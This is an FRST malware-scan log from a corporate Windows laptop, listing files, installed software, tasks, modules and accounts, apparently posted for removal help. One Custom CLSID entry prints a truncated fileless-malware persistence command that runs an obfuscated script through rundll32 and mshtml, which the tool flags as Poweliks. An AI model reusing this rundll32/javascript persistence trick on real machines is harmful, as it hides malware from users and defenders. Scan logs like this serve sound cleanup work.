2014-11-22 22:36 - 2014-04-09 12:59 - 00254960 _____ (Intel Corporation) C:\windows\system32\igfxext.exe
2014-11-22 22:36 - 2014-04-09 12:59 - 00185840 _____ (Intel Corporation) C:\windows\system32\difx64.exe
2014-11-22 22:36 - 2014-04-09 12:59 - 00172016 _____ (Intel Corporation) C:\windows\system32\igfxtray.exe
2014-11-22 22:36 - 2014-03-26 09:05 - 00342528 _____ (Intel(R) Corporation) C:\windows\system32\Drivers\IntcDAud.sys
2014-11-22 22:36 - 2014-03-20 07:48 - 00017074 _____ () C:\windows\system32\iglhxs64.vp
2014-11-22 22:36 - 2014-03-20 07:41 - 11176448 _____ (Intel Corporation) C:\windows\SysWOW64\igd10umd32.dll
2014-11-22 22:36 - 2014-03-20 07:40 - 12617728 _____ (Intel Corporation) C:\windows\system32\igdumd64.dll
2014-11-22 22:36 - 2014-03-20 07:40 - 05363520 _____ (Intel Corporation) C:\windows\system32\Drivers\igdkmd64.sys
2014-11-22 22:36 - 2014-03-20 07:40 - 00442880 _____ (Intel Corporation) C:\windows\system32\igfxdev.dll
2014-11-22 22:36 - 2014-03-20 07:40 - 00440320 _____ (Intel Corporation) C:\windows\system32\igfxrell.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00439808 _____ (Intel Corporation) C:\windows\system32\igfxrfra.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00439808 _____ (Intel Corporation) C:\windows\system32\igfxresn.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00439296 _____ (Intel Corporation) C:\windows\system32\igfxrrus.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00439296 _____ (Intel Corporation) C:\windows\system32\igfxrrom.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrsky.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrptg.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrplk.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrnld.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrita.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrhrv.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrdeu.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00438272 _____ (Intel Corporation) C:\windows\system32\igfxrhun.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00438272 _____ (Intel Corporation) C:\windows\system32\igfxrfin.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00438272 _____ (Intel Corporation) C:\windows\system32\igfxrcsy.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00437760 _____ (Intel Corporation) C:\windows\system32\igfxrtrk.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00437760 _____ (Intel Corporation) C:\windows\system32\igfxrsve.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00437760 _____ (Intel Corporation) C:\windows\system32\igfxrslv.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00437760 _____ (Intel Corporation) C:\windows\system32\igfxrptb.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00437760 _____ (Intel Corporation) C:\windows\system32\igfxrnor.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00437248 _____ (Intel Corporation) C:\windows\system32\igfxrtha.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00437248 _____ (Intel Corporation) C:\windows\system32\igfxrdan.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00435712 _____ (Intel Corporation) C:\windows\system32\igfxrheb.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00435712 _____ (Intel Corporation) C:\windows\system32\igfxrara.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00432128 _____ (Intel Corporation) C:\windows\system32\igfxrjpn.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00431104 _____ (Intel Corporation) C:\windows\system32\igfxrkor.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00429056 _____ (Intel Corporation) C:\windows\system32\igfxrcht.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00428544 _____ (Intel Corporation) C:\windows\system32\igfxrchs.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00410624 _____ (Intel Corporation) C:\windows\system32\igfxTMM.dll
2014-11-22 22:36 - 2014-03-20 07:40 - 00384512 _____ (Intel Corporation) C:\windows\system32\igfxpph.dll
2014-11-22 22:36 - 2014-03-20 07:40 - 00286208 _____ (Intel Corporation) C:\windows\system32\igfxrenu.lrc
2014-11-22 22:36 - 2014-03-20 07:40 - 00175104 _____ (Intel Corporation) C:\windows\system32\gfxSrvc.dll
2014-11-22 22:36 - 2014-03-20 07:40 - 00142336 _____ (Intel Corporation) C:\windows\system32\igfxdo.dll
2014-11-22 22:36 - 2014-03-20 07:40 - 00126976 _____ (Intel Corporation) C:\windows\system32\igfxcpl.cpl
2014-11-22 22:36 - 2014-03-20 07:40 - 00099328 _____ () C:\windows\system32\igdde64.dll
2014-11-22 22:36 - 2014-03-20 07:40 - 00078848 _____ () C:\windows\SysWOW64\igdde32.dll
2014-11-22 22:36 - 2014-03-20 07:40 - 00028672 _____ (Intel Corporation) C:\windows\system32\igfxexps.dll
2014-11-22 22:36 - 2014-03-20 07:40 - 00009728 _____ ( ) C:\windows\system32\IGFXDEVLib.dll
2014-11-22 22:36 - 2014-03-20 07:39 - 00330752 _____ (Intel Corporation) C:\windows\SysWOW64\igfxdv32.dll
2014-11-22 22:36 - 2014-03-20 07:39 - 00025088 _____ (Intel Corporation) C:\windows\SysWOW64\igfxexps32.dll
2014-11-22 22:36 - 2014-03-20 07:37 - 13031424 _____ (Intel Corporation) C:\windows\system32\ig4icd64.dll
2014-11-22 22:36 - 2014-03-20 07:37 - 10812928 _____ (Intel Corporation) C:\windows\SysWOW64\ig4icd32.dll
2014-11-19 22:16 - 2014-11-19 22:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel Driver Update Utility
2014-11-19 22:16 - 2014-11-19 22:16 - 00000000 ____D () C:\Program Files (x86)\Intel Driver Update Utility

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-17 10:24 - 2014-11-03 13:53 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-12-17 10:19 - 2014-11-03 12:49 - 01434965 _____ () C:\windows\WindowsUpdate.log
2014-12-17 10:00 - 2014-11-03 13:59 - 00000416 _____ () C:\windows\Tasks\DCAgentUpdater.job
2014-12-17 09:33 - 2014-11-03 13:55 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-12-17 09:05 - 2014-11-03 14:39 - 00000142 _____ () C:\windows\ODBC.INI
2014-12-17 09:04 - 2009-07-13 23:45 - 00027440 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-17 09:04 - 2009-07-13 23:45 - 00027440 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-12-17 09:01 - 2009-07-14 00:13 - 00785366 _____ () C:\windows\system32\PerfStringBackup.INI
2014-12-17 08:54 - 2014-11-03 13:55 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-12-17 08:53 - 2009-07-14 00:08 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-12-17 08:53 - 2009-07-13 23:51 - 00041210 _____ () C:\windows\setupact.log
2014-12-17 08:52 - 2010-11-20 22:47 - 00034106 _____ () C:\windows\PFRO.log
2014-12-16 22:00 - 2014-11-03 14:30 - 00000542 _____ () C:\windows\Tasks\Daily scheduled scan.job
2014-12-15 14:52 - 2009-07-13 21:34 - 00450771 ____R () C:\windows\system32\Drivers\etc\hosts.20141215-154132.backup
2014-12-15 10:10 - 2014-06-05 08:55 - 00798516 _____ () C:\windows\SysWOW64\PerfStringBackup.INI
2014-12-14 18:57 - 2014-11-03 13:53 - 00000624 _____ () C:\windows\system32\config\netlogon.ftl
2014-12-12 16:57 - 2014-11-03 15:13 - 00000000 ____D () C:\Users\gluskid\AppData\Local\Greenshot
2014-12-12 15:47 - 2014-11-03 13:55 - 00002189 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-12-11 13:52 - 2014-11-05 11:11 - 00000000 ____D () C:\Users\gluskid\Documents\PPT
2014-12-08 19:09 - 2014-11-03 15:13 - 00000000 ____D () C:\Users\gluskid\AppData\Local\DesktopCentral_Agent
2014-12-08 14:47 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\LiveKernelReports
2014-12-08 13:20 - 2014-11-03 15:13 - 00009004 __RSH () C:\Users\gluskid\ntuser.pol
2014-12-08 13:20 - 2014-11-03 15:13 - 00000000 ____D () C:\Users\gluskid
2014-12-04 13:03 - 2014-11-12 17:12 - 00000000 ____D () C:\Program Files (x86)\Intel
2014-12-04 13:02 - 2014-11-10 11:24 - 00000000 ____D () C:\windows\system32\appmgmt
2014-12-03 11:45 - 2014-11-12 12:02 - 00000000 ____D () C:\ProgramData\WebEx
2014-12-02 15:39 - 2014-11-04 15:11 - 00000000 ____D () C:\Users\gluskid\Desktop\Urban
2014-12-02 11:59 - 2014-11-04 15:11 - 00000000 ____D () C:\Users\gluskid\Desktop\Pardal
2014-12-02 09:55 - 2014-11-03 15:13 - 00000000 ____D () C:\Users\gluskid\AppData\Local\Microsoft Help
2014-11-27 16:40 - 2014-06-05 08:25 - 112710672 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-11-25 10:55 - 2014-11-12 14:08 - 00000000 ____D () C:\Users\gluskid\Desktop\AboveBelow the Line
2014-11-25 10:21 - 2009-07-13 23:45 - 00423400 _____ () C:\windows\system32\FNTCACHE.DAT
2014-11-24 15:38 - 2014-11-03 15:13 - 00111256 _____ () C:\Users\gluskid\AppData\Local\GDIPFONTCACHEV1.DAT
2014-11-24 04:14 - 2014-11-05 16:34 - 00000000 _____ () C:\windows\system32\vireng.log
2014-11-23 20:43 - 2014-11-03 14:21 - 00037174 __RSH () C:\ProgramData\ntuser.pol
2014-11-22 22:41 - 2014-11-12 19:29 - 00015370 _____ () C:\windows\system32\results.xml
2014-11-22 22:36 - 2014-11-10 20:19 - 00000000 ____D () C:\ProgramData\Intel
2014-11-22 22:36 - 2014-11-10 11:36 - 00000000 ____D () C:\ProgramData\Package Cache
2014-11-22 22:36 - 2014-11-03 13:54 - 00000000 ____D () C:\Program Files (x86)\Cisco
2014-11-22 22:36 - 2014-06-05 08:36 - 00000000 ____D () C:\Intel
2014-11-22 22:34 - 2014-11-10 20:18 - 00000000 ____D () C:\Program Files\Intel
2014-11-22 22:34 - 2014-11-03 12:35 - 00063208 _____ () C:\windows\DPINST.LOG
2014-11-19 23:22 - 2014-11-10 20:22 - 00006198 _____ () C:\WirelessDiagLog.csv
2014-11-19 23:20 - 2014-11-10 20:20 - 00000000 ____D () C:\Users\gluskid\AppData\Roaming\Intel

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-12-15 13:09

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-12-2014 01
Ran by gluskid at 2014-12-17 10:30:52
Running from C:\Users\gluskid\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2PB313KY
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Spybot - Search and Destroy (Enabled - Up to date) {20A26C15-1AF0-7CA3-9380-FAB824A7EE0D}
AV: Sophos Anti-Virus (Enabled - Up to date) {6BABF8F7-3EB6-BD1D-9167-8C5ECA060A29}
AS: Sophos Anti-Virus (Enabled - Up to date) {D0CA1913-188C-B293-ABD7-B72CB1814094}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
FW: Sophos Client Firewall (Enabled) {539079D2-74D9-BC45-BA38-256B34D54D52}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.0.0 - Adobe Systems)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.07) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.07 - Adobe Systems Incorporated)
Arkadin Outlook AddOn 3.1.8.0 (HKLM\...\Arkadin Outlook AddOn_is1) (Version: 3.1.8.0 - Arkadin)
ASAP Utilities (HKLM-x32\...\ASAP Utilities_is1) (Version: 4.8.0 - Bastien Mensink - A Must in Every Office BV)
Cisco AnyConnect VPN Client (HKLM-x32\...\{C1EC4E2D-6F63-4806-B88E-7685B6EC186E}) (Version: 2.5.6005 - Cisco Systems, Inc.)
Cisco Jabber (HKLM-x32\...\{0705CE47-12C7-4B51-8585-C9463074B6CE}) (Version: 9.7.0.18474 - Cisco Systems, Inc)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version: - Cisco WebEx LLC)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Greenshot 1.1.7.17 (HKLM\...\Greenshot_is1) (Version: 1.1.7.17 - Greenshot)
Intel(R) Chipset Device Software (x32 Version: 10.0.13 - Intel(R) Corporation) Hidden
Intel(R) Driver Update Utility 2.0 (x32 Version: 2.0.0.29 - Intel) Hidden
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.3517 - Intel Corporation)
Intel® Driver Update Utility (HKLM-x32\...\{8409c4f7-2340-4933-a304-5d37db4fb48b}) (Version: 2.0.0.29 - Intel)
Intel® PROSet/Wireless Software (HKLM-x32\...\{eddf4201-b72e-4e94-9e7b-ac1ba97c029f}) (Version: 16.11.0 - Intel Corporation)
Java 8 Update 25 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418025F0}) (Version: 8.0.250 - Oracle Corporation)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
ManageEngine AssetExplorer Agent (HKLM-x32\...\{B64DBD74-C4E8-4404-BE32-81769EC14472}) (Version: 1.0.12 - ZOHO Corp)
ManageEngine Desktop Central 9 - Agent (HKLM-x32\...\{6AD2231F-FF48-4D59-AC26-405AFAE23DB7}) (Version: 9.0.23.W - ZohoCorp)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-0012-0000-0000-0000000FF1CE}_Office14.STANDARD_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft)
Microsoft Office Standard 2010 (HKLM-x32\...\Office14.STANDARD) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft Visio Viewer 2010 (HKLM-x32\...\{95140000-0052-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Mozilla Firefox 32.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 32.0 (x86 en-US)) (Version: 32.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 32.0 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
PDF24 Creator 5.6.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org)
Sophos Anti-Virus (HKLM-x32\...\{D929B3B5-56C6-46CC-B3A3-A1A784CBB8E4}) (Version: 10.3.11 - Sophos Limited)
Sophos AutoUpdate (HKLM-x32\...\{D924231F-D02D-4E0B-B511-CC4A0E3ED547}) (Version: 3.1.4.81 - Sophos Limited)
Sophos Client Firewall (HKLM-x32\...\{A805FB2A-A844-4cba-8088-CA64087D59E1}) (Version: 2.9.4 - Sophos Limited)
Sophos Remote Management System (HKLM-x32\...\{FED1005D-CBC8-45D5-A288-FFC7BB304121}) (Version: 3.4.1 - Sophos Limited)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
WebEx Productivity Tools (HKLM-x32\...\{17BC5B75-6692-40E6-A347-849F595BC802}) (Version: 2.29.3210 - Cisco WebEx LLC)
WinZip 12.1 (HKLM-x32\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240B8}) (Version: 12.1.8519 - WinZip Computing, S.L. )

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2118340153-1145135853-813105556-21214_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?

==================== Restore Points =========================

11-11-2014 02:34:42 Intel® PROSet/Wireless Software
13-11-2014 12:47:04 Intel® PROSet/Wireless Software
13-11-2014 12:48:28 Intel® Driver Update Utility
13-11-2014 13:08:58 Installed Intel(R) PROSet/Wireless WiFi Software.
19-11-2014 22:13:00 Windows Update
20-11-2014 03:11:35 Removed Intel(R) PROSet/Wireless WiFi Software.
20-11-2014 03:16:00 Intel® Driver Update Utility
20-11-2014 04:18:33 Intel® PROSet/Wireless Software
23-11-2014 03:33:54 Intel® PROSet/Wireless Software
24-11-2014 20:33:54 Installed HP Support Solutions Framework
25-11-2014 14:17:10 Windows Update
02-12-2014 12:30:43 Windows Update
04-12-2014 18:01:35 Removed HP Support Solutions Framework
05-12-2014 14:57:53 Windows Update
12-12-2014 17:44:37 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2014-12-15 15:41 - 00000938 ____R C:\windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1E7C52DB-6491-4F9D-9483-7C46B126D266} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Task: {4A59349A-0EB4-42E3-8E9C-11B6B0E1E132} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-11-03] (Google Inc.)
Task: {6B3E56F7-3B4C-47D9-8443-0EA47EB8EC60} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-11-03] (Google Inc.)
Task: {DAF733EF-918F-4C97-A6D2-6AFD50DE9618} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
Task: {DBE3B7EB-82B9-484C-BBF6-73AF39ECEC66} - System32\Tasks\Daily scheduled scan => C:\Program Files (x86)\Sophos\Sophos Anti-Virus\BackgroundScanClient.exe [2014-11-03] (Sophos Limited)
Task: {DEB60DF5-D86A-4AA6-9902-B9EB2B986769} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-03] (Adobe Systems Incorporated)
Task: {E2139D9F-02DC-47AC-9FD0-2115F34C5049} - System32\Tasks\DCAgentUpdater => C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagentupgrader.exe [2014-05-16] ()
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\windows\Tasks\Daily scheduled scan.job => C:\Program Files (x86)\Sophos\Sophos Anti-Virus\BackgroundScanClient.exe
Task: C:\windows\Tasks\DCAgentUpdater.job => C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagentupgrader.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe

==================== Loaded Modules (whitelisted) =============

2012-06-28 17:09 - 2012-06-28 17:09 - 00598016 _____ () C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\agentmonitor.exe
2012-06-28 17:09 - 2012-06-28 17:09 - 00614400 _____ () C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\aeagent.exe
2014-05-16 04:13 - 2014-05-16 04:13 - 00556392 _____ () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagentservice.exe
2014-05-16 04:13 - 2014-05-16 04:13 - 00593256 _____ () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcondemand.exe
2014-05-16 04:13 - 2014-05-16 04:13 - 00806248 _____ () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcswmeter.exe
2012-01-10 20:12 - 2012-01-10 20:12 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-05-16 04:13 - 2014-05-16 04:13 - 00769384 _____ () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagenttrayicon.exe
2012-06-28 17:09 - 2012-06-28 17:09 - 00159744 _____ () C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\SSLEAY32.dll
2012-06-28 17:09 - 2012-06-28 17:09 - 00843776 _____ () C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\LIBEAY32.dll
2014-12-15 00:02 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-12-15 00:02 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2014-12-15 00:02 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-12-15 00:02 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2014-12-15 00:02 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2014-11-03 14:52 - 2014-11-03 14:52 - 01055808 _____ () C:\Program Files (x86)\Sophos\Remote Management System\ACE.dll
2014-11-03 14:52 - 2014-11-03 14:52 - 01539136 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO.dll
2014-11-03 14:52 - 2014-11-03 14:52 - 00183360 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_DynamicAny.dll
2014-11-03 14:52 - 2014-11-03 14:52 - 00760896 _____ () C:\Program Files (x86)\Sophos\Remote Management System\LIBEAY32.dll
2014-11-03 14:52 - 2014-11-03 14:52 - 00146496 _____ () C:\Program Files (x86)\Sophos\Remote Management System\SSLEAY32.dll
2014-11-03 14:52 - 2014-11-03 14:52 - 00076864 _____ () C:\Program Files (x86)\Sophos\Remote Management System\ACE_SSL.dll
2014-11-03 14:52 - 2014-11-03 14:52 - 00535616 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_PortableServer.dll
2014-11-03 14:52 - 2014-11-03 14:52 - 00244800 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_SSLIOP.DLL
2014-11-03 14:52 - 2014-11-03 14:52 - 00740416 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_Security.dll
2014-11-03 14:52 - 2014-11-03 14:52 - 00039488 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_Valuetype.dll
2014-11-03 14:52 - 2014-11-03 14:52 - 00244800 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_SSLIOP.dll
2014-12-15 00:02 - 2014-04-25 14:11 - 02972112 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\NotificationSpreader.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2014-11-04 15:42 - 2014-11-01 08:54 - 00004608 _____ () C:\Program Files (x86)\Arkadin\Outlook AddOn V3\ManagedAggregator2010.dll
2014-11-04 15:42 - 2014-11-01 08:54 - 00035328 _____ () C:\Program Files (x86)\Arkadin\Outlook AddOn V3\Outlook2010Addin.dll
2014-11-04 15:42 - 2014-11-01 08:54 - 00005632 _____ () C:\Program Files (x86)\Arkadin\Outlook AddOn V3\Outlook2010Interface.dll
2014-11-04 15:42 - 2014-11-01 08:54 - 00216576 _____ () C:\Program Files (x86)\Arkadin\Outlook AddOn V3\ArkaOutlookInterface2010.dll
2014-11-04 15:42 - 2014-11-01 08:54 - 00101888 _____ () C:\Program Files (x86)\Arkadin\Outlook AddOn V3\ArkaOutlookAddin.dll
2010-10-25 15:13 - 2010-10-25 15:13 - 02893216 _____ () C:\Program Files (x86)\Adobe\Acrobat 10.0\PDFMaker\Common\AdobePDFMakerX.dll
2010-12-21 01:15 - 2010-12-21 01:15 - 01041248 _____ () C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\UmOutlookAddin.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SAVService => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SAVService => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Sophos Client Firewall => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Sophos Client Firewall Manager => ""="service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-975400410-3068043782-3249626173-500 - Administrator - Enabled) => C:\Users\Administrator
Guest (S-1-5-21-975400410-3068043782-3249626173-501 - Limited - Disabled)
SophosSAUGLUSKID-LT0 (S-1-5-21-975400410-3068043782-3249626173-1006 - Limited - Enabled)

==================== Faulty Device Manager Devices =============

Name: Cisco AnyConnect VPN Virtual Miniport Adapter for Windows x64
Description: Cisco AnyConnect VPN Virtual Miniport Adapter for Windows x64
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: vpnva
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:
==================
Error: (12/17/2014 10:09:07 AM) (Source: Sophos Message Router) (EventID: 8006) (User: NT AUTHORITY)
Description: The network identity (also known as the Interoperable Object Reference or IOR) of the local computer is invalid.%%3

